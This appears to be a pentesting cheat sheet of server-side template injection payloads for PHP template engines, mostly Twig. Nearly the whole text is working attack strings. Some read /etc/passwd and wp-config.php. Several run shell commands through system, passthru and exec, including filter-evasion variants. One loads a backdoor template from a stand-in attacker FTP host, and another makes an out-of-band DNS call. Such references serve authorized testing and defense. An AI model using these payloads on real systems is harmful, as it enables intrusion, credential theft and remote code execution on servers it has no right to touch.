php
PHP
Templating Libraries
| Template Name | Payload Format |
|---|---|
| Blade (Laravel) | {{ }} |
| Latte | {var $X=""}{$X} |
| Mustache | {{ }} |
| Plates | <?= ?> |
| Smarty | { } |
| Twig | {{ }} |
Twig
Twig is a modern, flexible, fast, and secure template engine for PHP. It is widely used for creating dynamic and engaging user interfaces in web applications, offering a clear separation between presentation and business logic.
Basic Injection
{{7*7}}
{{7*'7'}} would result in 49
{{dump(app)}}
{{dump(_context)}}
{{app.request.server.all|join(',')}}
{{ _self }}
Arbitrary File Reading
{{ "/etc/passwd"|file_excerpt(1,-1) }}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{include("wp-config.php")}}
Code Execution
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{[0]|reduce('system','id')}}
{{['id']|map('system')|join}}
{{['id',1]|sort('system')|join}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['id']|filter('passthru')}}
{{['id']|map('passthru')}}
{{['nslookup oastify.com']|filter('system')}}